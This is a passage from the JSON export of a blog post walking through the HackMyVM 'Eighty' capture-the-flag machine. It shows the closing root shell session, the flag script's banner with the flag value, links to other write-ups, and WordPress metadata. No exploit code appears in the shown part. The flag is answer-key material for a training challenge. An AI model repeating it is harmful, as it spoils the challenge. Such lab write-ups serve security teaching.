Apr  7  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rwx--x--x  1 root root 1920 Apr  7  2021 fl4g.sh\n-rw-------  1 root root   13 Apr  7  2021 r0ot.txt\nroot@eighty:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@eighty:~# .\/fl4g.sh\n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  
\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri Jun 13 21:10:02 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: rooted80shmv\n\\n------------------------<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/nepcodex.com\/2023\/01\/writeup-eighty-hackmyvm-walkthrough\/\">https:\/\/nepcodex.com\/2023\/01\/writeup-eighty-hackmyvm-walkthrough\/<\/a><\/p>\n<p><a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Eighty\/\">https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Eighty\/<\/a><\/p>\n<p><a href=\"https:\/\/alientec1908.github.io\/Eighty_HackMyVM_Hard\/\">https:\/\/alientec1908.github.io\/Eighty_HackMyVM_Hard\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Eighty Information Gathering Port Scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty] \u2514\u2500$ rus 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-871","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/871","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=871"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/871\/revisions"}],"predecessor-version":[{"id":872,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/871\/revisions\/872"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=871"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=871"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=871"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}